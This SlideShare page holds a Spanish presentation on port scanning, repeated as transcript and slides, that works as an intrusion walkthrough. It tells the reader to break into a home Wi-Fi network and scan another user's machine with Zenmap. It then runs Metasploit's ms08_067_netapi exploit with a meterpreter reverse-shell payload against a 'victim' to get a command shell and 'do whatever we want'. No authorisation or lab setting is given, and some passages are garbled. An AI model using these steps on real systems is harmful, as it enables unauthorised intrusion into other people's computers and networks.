SlideShare ist ein Scribd-Unternehmen logo
1 von 9
Los puertos comunes como FTP (21) y HTTP (80) frecuentemente están bien 
protegidos y posiblemente sean vulnerables solo con acciones todavía por descubrir. 
 Trata otros puertos TCP y UDP que puedan olvidarse, como Telner y varios 
puertos UDP que se dejan abiertos para jugar por LAN. 
 Un puerto 22 abierto es usualmente evidencia de un servicio SSH (secure shell) 
en el objetivo, que algunas veces puede ser forzado abruptamente. 
Para vulnerar la seguridad 
1. Se vulnera la seguridad de una red puede ser WLAN_XXXX, CASA, HOGAR, etc. 
2. Luego se escanea la red con IPSCAN, para luego designar una ip. 
3. Luego se abre el cmd, y se ejecuta el siguiente comando.
Ejecute netstat con la opción -a para visualizar todas las conexiones 
activas en el sistema, tanto TCP como UDP:
Con la herramienta PORT SCANNER, se ingresa la IP de uno de los 
usuarios de la red para luego escanear que puertos están abiertos, y 
examinar la manera de vulnerar.
PUERTOS ESCANEADOS: 
 80/TCP: HTTP HyperText Transfer Protocol (Protocolo de 
Transferencia de HiperTexto) (WWW). 
 139/TCP: NetBIOS Servicio de sesiones 
 445/TCP: Microsoft-DS (Active Directory, compartición en Windows, 
gusano Sasser, Agobot) o también es usado por Microsoft-DS 
compartición de ficheros.
ENTRAR DESDE TELNET: 
 Abres una sesión TELNET desde 
Inicio>Ejecutar. En la ventana, desde el 
símbolo de comandos, tecleas 
 telnet XXX.XXX.XXX.XXX 
 donde las X representan la IP del router, es 
decir, la puerta de enlace. Por ejemplo: 
 telnet 192.168.1.1 
 A continuación, se te solicitará la contraseña 
del router para acceder a su menú de 
configuración. 
 Creo que es eso lo que necesitas. 
 Ahora introducimos el comando set naptserver: 
 Transport protocol [tcp udp gre ]: (para elegir el 
protocolo entre estos 3) en el ejemplo TCP 
 Service [name or port number]: Podemos introducir el 
número de puerto. En el ejemplo 4000 
 Server IP Address [self or IP address]: Aquí 
introducimos la ip privada del pc que vaya a hacer de 
servidor de nuestra aplicación. En el ejemplo 
192.168.1.199 (hay que borrar primero self, que sale 
puesto)
USANDO ZENMAP: 
Cuando descargues Nmap, también puedes descargar "Zenmap GUI" junto con él. Ábrelo una vez que lo 
encuentres, coloca el Protocolo de Internet (IP) de la computadora que quieres hackear en el campo "Objetivo". 
Digamos que quieres escanear un rango de direcciones IP, entonces tendrías que escribir la dirección IP inicial 
seguido de (sin espacios) un guión (-) y el final de la última dirección IP. Por ejemplo, si quieres escanear 
192.168.1.100 a 192.168.1.299, entonces deberías escribir 192.168.1.100-299. En el menú del "Perfil" de 
Zenmap selecciona "exploración intensa" si no está seleccionado. Haz clic en el Explorador y el programa 
escaneará la computadora o dispositivo de los puertos abiertos. Mira el Nmap de salida hasta que veas algunas 
palabras en verde. Estos son los puertos abiertos en el equipo o dispositivo. Si el puerto 23 está abierto, el 
dispositivo podrá hackearse si no tiene ninguna contraseña definida.
UTILIZANDO METAXPLOIT 
Un puerto TCP/IP abierto por defecto en el sistema operativo puede 
permitir a un usuario ingresar facilmente a su sistema si 
autorizacion nos puede llegar a consumir 100% de los recurso del 
equipo y dejar destrozos o hasta dejar fuera de funcionamiento 
Se necesita una pc con backtrack. 
Lo siguiente tenemos que ver si nuestra victima tiene habilitado el 
puerto 445 #nmap -sS -sP 192.168.1.26 
como lo tiene abilitado empezaremos hacer el trabajo de conexión 
con metasploit 
#msfconsole 
buscamos el exploit que usaremos 
#search /windows/smb/ms 
#use exploit/windows/smb/ms08_067_netapi 
ahora hay que asignar la direccion de la victima y la nuestra 
> set payload windows/meterpreter/reverse_tcp 
> set rhost 192.168.1.26 (ip de victima) 
> set lhost 192.168.1.28 (nuestra ip) 
> exploit ------>ejecutamos el exploit
ahora escribimos shell para ingresar al cmd de nuestra victima 
>shell 
cd .. 
cd .. 
hicimos dos cd .. para quedar ubicados en el disco duro C: 
hacemos un dir para saber que tiene en el disco duro 
y hacemos lo que queramos ahora crear carpetas, apagar el 
equipo, etc.
Habiendo decidido el puerto queda por saber el 
exploit que usaremos. Consultando la 
documentación de Metasploit vemos que para el 
puerto 445/tcp existen varios exploits. También 
puede verse una lista de los exploits disponibles 
por medio del comando show exploits. En mi caso 
me quedaré con el 
siguiente: windows/smb/ms08_067_netapi. 
Ahora seleccionamos el payload que inyectaremos. 
Podemos ver los payloads compatibles con el 
exploit seleccionado con el comando show 
payloads. 
Seleccionaremos el 
payload windows/shell_bind_tcp, que nos abre 
una shell. 
EJECUTADO PAYLOADS: 
Ahora nos queda ver el resto de parámetros 
necesarios antes de ejecutar el ataque. Para ello 
tenemos el comando show options 
Podemos ver como de todos los parametros a introducir tan 
solo hace falta especificar uno: RHOST que como bien se indica 
corresponde a la IP de la víctima (the target address).

Weitere ähnliche Inhalte

Was ist angesagt?

Ethical hacking 01
Ethical hacking 01Ethical hacking 01
Ethical hacking 01Tensor
 
Nmap backtrackgblatino pacman_id
Nmap backtrackgblatino pacman_idNmap backtrackgblatino pacman_id
Nmap backtrackgblatino pacman_idpacmanid
 
Ethical hacking 00a
Ethical hacking 00aEthical hacking 00a
Ethical hacking 00aTensor
 
Nmap6 cheatsheet eng v1
Nmap6 cheatsheet eng v1Nmap6 cheatsheet eng v1
Nmap6 cheatsheet eng v1DamianGreg
 
Curso Basico Ponencia 3
Curso Basico Ponencia 3Curso Basico Ponencia 3
Curso Basico Ponencia 3Antonio Durán
 
MAITAINING ACCESS
MAITAINING ACCESSMAITAINING ACCESS
MAITAINING ACCESSTensor
 
Que es y como usar nmap
Que es y como usar nmapQue es y como usar nmap
Que es y como usar nmapLuis Pinilla
 
Escaneo de puertos clase 2 complemento E 28 02-13
Escaneo de puertos clase 2 complemento E 28 02-13Escaneo de puertos clase 2 complemento E 28 02-13
Escaneo de puertos clase 2 complemento E 28 02-13Tensor
 
Tecnicas avanzadas de penetracion a sistemas
Tecnicas avanzadas de penetracion a sistemasTecnicas avanzadas de penetracion a sistemas
Tecnicas avanzadas de penetracion a sistemasRafael Seg
 
Seguridad en Servidores CentOS con Elastix + Buenas Prácticas
Seguridad en Servidores CentOS con Elastix + Buenas PrácticasSeguridad en Servidores CentOS con Elastix + Buenas Prácticas
Seguridad en Servidores CentOS con Elastix + Buenas Prácticasrodrimartin
 
Herramienta net stat
Herramienta net statHerramienta net stat
Herramienta net statStuart Guzman
 
Ethical hacking 03
Ethical hacking 03Ethical hacking 03
Ethical hacking 03Tensor
 
Interesante pero mal maquetado zenmap 212027457-zenmap (1)
Interesante pero mal maquetado zenmap   212027457-zenmap (1)Interesante pero mal maquetado zenmap   212027457-zenmap (1)
Interesante pero mal maquetado zenmap 212027457-zenmap (1)xavazquez
 

Was ist angesagt? (20)

Nmap
NmapNmap
Nmap
 
Práctica 5
Práctica 5Práctica 5
Práctica 5
 
Ethical hacking 01
Ethical hacking 01Ethical hacking 01
Ethical hacking 01
 
Nmap
NmapNmap
Nmap
 
Nmap backtrackgblatino pacman_id
Nmap backtrackgblatino pacman_idNmap backtrackgblatino pacman_id
Nmap backtrackgblatino pacman_id
 
Ethical hacking 00a
Ethical hacking 00aEthical hacking 00a
Ethical hacking 00a
 
Uso del escáner de puertos nmap
Uso del escáner de puertos nmapUso del escáner de puertos nmap
Uso del escáner de puertos nmap
 
Nmap6 cheatsheet eng v1
Nmap6 cheatsheet eng v1Nmap6 cheatsheet eng v1
Nmap6 cheatsheet eng v1
 
Nmap
NmapNmap
Nmap
 
Curso Basico Ponencia 3
Curso Basico Ponencia 3Curso Basico Ponencia 3
Curso Basico Ponencia 3
 
MAITAINING ACCESS
MAITAINING ACCESSMAITAINING ACCESS
MAITAINING ACCESS
 
Que es y como usar nmap
Que es y como usar nmapQue es y como usar nmap
Que es y como usar nmap
 
Escaneo de puertos clase 2 complemento E 28 02-13
Escaneo de puertos clase 2 complemento E 28 02-13Escaneo de puertos clase 2 complemento E 28 02-13
Escaneo de puertos clase 2 complemento E 28 02-13
 
Tecnicas avanzadas de penetracion a sistemas
Tecnicas avanzadas de penetracion a sistemasTecnicas avanzadas de penetracion a sistemas
Tecnicas avanzadas de penetracion a sistemas
 
Seguridad en Servidores CentOS con Elastix + Buenas Prácticas
Seguridad en Servidores CentOS con Elastix + Buenas PrácticasSeguridad en Servidores CentOS con Elastix + Buenas Prácticas
Seguridad en Servidores CentOS con Elastix + Buenas Prácticas
 
Uso de Telnet en Windows y Linux
Uso de Telnet en Windows y LinuxUso de Telnet en Windows y Linux
Uso de Telnet en Windows y Linux
 
Herramienta net stat
Herramienta net statHerramienta net stat
Herramienta net stat
 
Ethical hacking 03
Ethical hacking 03Ethical hacking 03
Ethical hacking 03
 
Comandos de red
Comandos de redComandos de red
Comandos de red
 
Interesante pero mal maquetado zenmap 212027457-zenmap (1)
Interesante pero mal maquetado zenmap   212027457-zenmap (1)Interesante pero mal maquetado zenmap   212027457-zenmap (1)
Interesante pero mal maquetado zenmap 212027457-zenmap (1)
 

Andere mochten auch

Trabajoredeszenmap
TrabajoredeszenmapTrabajoredeszenmap
Trabajoredeszenmapmaxbujin
 
Marketing Online
Marketing OnlineMarketing Online
Marketing Onlinearnoldvq16
 
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)TR Hirecom
 
Norma ISO 38500
Norma ISO 38500Norma ISO 38500
Norma ISO 38500arnoldvq16
 
Tecnicas de escaneo de puertos
Tecnicas de escaneo de puertosTecnicas de escaneo de puertos
Tecnicas de escaneo de puertosFrancisco Vergara
 

Andere mochten auch (6)

Trabajoredeszenmap
TrabajoredeszenmapTrabajoredeszenmap
Trabajoredeszenmap
 
Zenmap
ZenmapZenmap
Zenmap
 
Marketing Online
Marketing OnlineMarketing Online
Marketing Online
 
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
 
Norma ISO 38500
Norma ISO 38500Norma ISO 38500
Norma ISO 38500
 
Tecnicas de escaneo de puertos
Tecnicas de escaneo de puertosTecnicas de escaneo de puertos
Tecnicas de escaneo de puertos
 

Ähnlich wie Escaneo de Puertos

Listas de acceso estándar y extendidas
Listas de acceso estándar y extendidasListas de acceso estándar y extendidas
Listas de acceso estándar y extendidasJAV_999
 
Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3Brat Stell
 
Tcpdump
TcpdumpTcpdump
TcpdumpTensor
 
Articulo nmap pvalera
Articulo nmap pvaleraArticulo nmap pvalera
Articulo nmap pvaleraguest30c8e1
 
Taller comandos para solucionar problemas en la red
Taller comandos para  solucionar problemas en la redTaller comandos para  solucionar problemas en la red
Taller comandos para solucionar problemas en la redguestf6e4f00
 
How to medidas de desempeño
How to medidas de desempeñoHow to medidas de desempeño
How to medidas de desempeñomiss051
 
Comandos utilizados en redes anderson alvarado 6to computacion
Comandos utilizados en redes anderson alvarado 6to computacionComandos utilizados en redes anderson alvarado 6to computacion
Comandos utilizados en redes anderson alvarado 6to computacionAnder Alvarado
 
Tcpdump a.2
Tcpdump a.2Tcpdump a.2
Tcpdump a.2Tensor
 
Queesycomousarnmap 150527171529-lva1-app6892
Queesycomousarnmap 150527171529-lva1-app6892Queesycomousarnmap 150527171529-lva1-app6892
Queesycomousarnmap 150527171529-lva1-app6892Karina Gutiérrez
 
Topetecervantes y sandovalcardenas.utilerias
Topetecervantes y sandovalcardenas.utileriasTopetecervantes y sandovalcardenas.utilerias
Topetecervantes y sandovalcardenas.utileriaspepe topete
 

Ähnlich wie Escaneo de Puertos (20)

Ejercicios de redes e internet 1
Ejercicios de redes e internet 1Ejercicios de redes e internet 1
Ejercicios de redes e internet 1
 
Listas de acceso
Listas de accesoListas de acceso
Listas de acceso
 
Listas de acceso estándar y extendidas
Listas de acceso estándar y extendidasListas de acceso estándar y extendidas
Listas de acceso estándar y extendidas
 
Comandos de red
Comandos de red Comandos de red
Comandos de red
 
Nmap
NmapNmap
Nmap
 
Practicas hackx crack_05
Practicas hackx crack_05Practicas hackx crack_05
Practicas hackx crack_05
 
PROCESOS EN LINUX. ::: http://leymebamba.com
PROCESOS EN LINUX.   ::: http://leymebamba.comPROCESOS EN LINUX.   ::: http://leymebamba.com
PROCESOS EN LINUX. ::: http://leymebamba.com
 
Comandos de red
Comandos de redComandos de red
Comandos de red
 
Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3
 
Tcpdump
TcpdumpTcpdump
Tcpdump
 
Articulo nmap pvalera
Articulo nmap pvaleraArticulo nmap pvalera
Articulo nmap pvalera
 
Taller comandos para solucionar problemas en la red
Taller comandos para  solucionar problemas en la redTaller comandos para  solucionar problemas en la red
Taller comandos para solucionar problemas en la red
 
How to medidas de desempeño
How to medidas de desempeñoHow to medidas de desempeño
How to medidas de desempeño
 
Comandos de Red
Comandos de RedComandos de Red
Comandos de Red
 
Curso Redes Linex 5
Curso Redes Linex 5Curso Redes Linex 5
Curso Redes Linex 5
 
Curso Redes Linex 5
Curso Redes Linex 5Curso Redes Linex 5
Curso Redes Linex 5
 
Comandos utilizados en redes anderson alvarado 6to computacion
Comandos utilizados en redes anderson alvarado 6to computacionComandos utilizados en redes anderson alvarado 6to computacion
Comandos utilizados en redes anderson alvarado 6to computacion
 
Tcpdump a.2
Tcpdump a.2Tcpdump a.2
Tcpdump a.2
 
Queesycomousarnmap 150527171529-lva1-app6892
Queesycomousarnmap 150527171529-lva1-app6892Queesycomousarnmap 150527171529-lva1-app6892
Queesycomousarnmap 150527171529-lva1-app6892
 
Topetecervantes y sandovalcardenas.utilerias
Topetecervantes y sandovalcardenas.utileriasTopetecervantes y sandovalcardenas.utilerias
Topetecervantes y sandovalcardenas.utilerias
 

Kürzlich hochgeladen

Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6    CREAR UN RECURSO MULTIMEDIAActividad integradora 6    CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA241531640
 
Segunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxSegunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxMariaBurgos55
 
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxNombre Apellidos
 
Mapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMidwarHenryLOZAFLORE
 
Plan Sarmiento - Netbook del GCBA 2019..
Plan Sarmiento - Netbook del GCBA 2019..Plan Sarmiento - Netbook del GCBA 2019..
Plan Sarmiento - Netbook del GCBA 2019..RobertoGumucio2
 
El uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELEl uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELmaryfer27m
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfSergioMendoza354770
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafiosFundación YOD YOD
 
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptdokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptMiguelAtencio10
 
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas  educativadefinicion segun autores de matemáticas  educativa
definicion segun autores de matemáticas educativaAdrianaMartnez618894
 
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptxFloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx241522327
 
Arenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxArenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxJOSEFERNANDOARENASCA
 
tics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxtics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxazmysanros90
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx241523733
 
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptxEl_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptxAlexander López
 
R1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaR1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaarkananubis
 
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptxGoogle-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptxAlexander López
 
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxaylincamaho
 
El uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante  que sonEl uso de las tic en la vida ,lo importante  que son
El uso de las tic en la vida ,lo importante que son241514984
 
El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.241514949
 

Kürzlich hochgeladen (20)

Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6    CREAR UN RECURSO MULTIMEDIAActividad integradora 6    CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
 
Segunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxSegunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptx
 
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
 
Mapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptx
 
Plan Sarmiento - Netbook del GCBA 2019..
Plan Sarmiento - Netbook del GCBA 2019..Plan Sarmiento - Netbook del GCBA 2019..
Plan Sarmiento - Netbook del GCBA 2019..
 
El uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELEl uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFEL
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafios
 
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptdokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.ppt
 
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas  educativadefinicion segun autores de matemáticas  educativa
definicion segun autores de matemáticas educativa
 
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptxFloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx
 
Arenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxArenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptx
 
tics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxtics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptx
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx
 
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptxEl_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
 
R1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaR1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en mina
 
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptxGoogle-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
 
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
 
El uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante  que sonEl uso de las tic en la vida ,lo importante  que son
El uso de las tic en la vida ,lo importante que son
 
El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.
 

Escaneo de Puertos

  • 1. Los puertos comunes como FTP (21) y HTTP (80) frecuentemente están bien protegidos y posiblemente sean vulnerables solo con acciones todavía por descubrir.  Trata otros puertos TCP y UDP que puedan olvidarse, como Telner y varios puertos UDP que se dejan abiertos para jugar por LAN.  Un puerto 22 abierto es usualmente evidencia de un servicio SSH (secure shell) en el objetivo, que algunas veces puede ser forzado abruptamente. Para vulnerar la seguridad 1. Se vulnera la seguridad de una red puede ser WLAN_XXXX, CASA, HOGAR, etc. 2. Luego se escanea la red con IPSCAN, para luego designar una ip. 3. Luego se abre el cmd, y se ejecuta el siguiente comando.
  • 2. Ejecute netstat con la opción -a para visualizar todas las conexiones activas en el sistema, tanto TCP como UDP:
  • 3. Con la herramienta PORT SCANNER, se ingresa la IP de uno de los usuarios de la red para luego escanear que puertos están abiertos, y examinar la manera de vulnerar.
  • 4. PUERTOS ESCANEADOS:  80/TCP: HTTP HyperText Transfer Protocol (Protocolo de Transferencia de HiperTexto) (WWW).  139/TCP: NetBIOS Servicio de sesiones  445/TCP: Microsoft-DS (Active Directory, compartición en Windows, gusano Sasser, Agobot) o también es usado por Microsoft-DS compartición de ficheros.
  • 5. ENTRAR DESDE TELNET:  Abres una sesión TELNET desde Inicio>Ejecutar. En la ventana, desde el símbolo de comandos, tecleas  telnet XXX.XXX.XXX.XXX  donde las X representan la IP del router, es decir, la puerta de enlace. Por ejemplo:  telnet 192.168.1.1  A continuación, se te solicitará la contraseña del router para acceder a su menú de configuración.  Creo que es eso lo que necesitas.  Ahora introducimos el comando set naptserver:  Transport protocol [tcp udp gre ]: (para elegir el protocolo entre estos 3) en el ejemplo TCP  Service [name or port number]: Podemos introducir el número de puerto. En el ejemplo 4000  Server IP Address [self or IP address]: Aquí introducimos la ip privada del pc que vaya a hacer de servidor de nuestra aplicación. En el ejemplo 192.168.1.199 (hay que borrar primero self, que sale puesto)
  • 6. USANDO ZENMAP: Cuando descargues Nmap, también puedes descargar "Zenmap GUI" junto con él. Ábrelo una vez que lo encuentres, coloca el Protocolo de Internet (IP) de la computadora que quieres hackear en el campo "Objetivo". Digamos que quieres escanear un rango de direcciones IP, entonces tendrías que escribir la dirección IP inicial seguido de (sin espacios) un guión (-) y el final de la última dirección IP. Por ejemplo, si quieres escanear 192.168.1.100 a 192.168.1.299, entonces deberías escribir 192.168.1.100-299. En el menú del "Perfil" de Zenmap selecciona "exploración intensa" si no está seleccionado. Haz clic en el Explorador y el programa escaneará la computadora o dispositivo de los puertos abiertos. Mira el Nmap de salida hasta que veas algunas palabras en verde. Estos son los puertos abiertos en el equipo o dispositivo. Si el puerto 23 está abierto, el dispositivo podrá hackearse si no tiene ninguna contraseña definida.
  • 7. UTILIZANDO METAXPLOIT Un puerto TCP/IP abierto por defecto en el sistema operativo puede permitir a un usuario ingresar facilmente a su sistema si autorizacion nos puede llegar a consumir 100% de los recurso del equipo y dejar destrozos o hasta dejar fuera de funcionamiento Se necesita una pc con backtrack. Lo siguiente tenemos que ver si nuestra victima tiene habilitado el puerto 445 #nmap -sS -sP 192.168.1.26 como lo tiene abilitado empezaremos hacer el trabajo de conexión con metasploit #msfconsole buscamos el exploit que usaremos #search /windows/smb/ms #use exploit/windows/smb/ms08_067_netapi ahora hay que asignar la direccion de la victima y la nuestra > set payload windows/meterpreter/reverse_tcp > set rhost 192.168.1.26 (ip de victima) > set lhost 192.168.1.28 (nuestra ip) > exploit ------>ejecutamos el exploit
  • 8. ahora escribimos shell para ingresar al cmd de nuestra victima >shell cd .. cd .. hicimos dos cd .. para quedar ubicados en el disco duro C: hacemos un dir para saber que tiene en el disco duro y hacemos lo que queramos ahora crear carpetas, apagar el equipo, etc.
  • 9. Habiendo decidido el puerto queda por saber el exploit que usaremos. Consultando la documentación de Metasploit vemos que para el puerto 445/tcp existen varios exploits. También puede verse una lista de los exploits disponibles por medio del comando show exploits. En mi caso me quedaré con el siguiente: windows/smb/ms08_067_netapi. Ahora seleccionamos el payload que inyectaremos. Podemos ver los payloads compatibles con el exploit seleccionado con el comando show payloads. Seleccionaremos el payload windows/shell_bind_tcp, que nos abre una shell. EJECUTADO PAYLOADS: Ahora nos queda ver el resto de parámetros necesarios antes de ejecutar el ataque. Para ello tenemos el comando show options Podemos ver como de todos los parametros a introducir tan solo hace falta especificar uno: RHOST que como bien se indica corresponde a la IP de la víctima (the target address).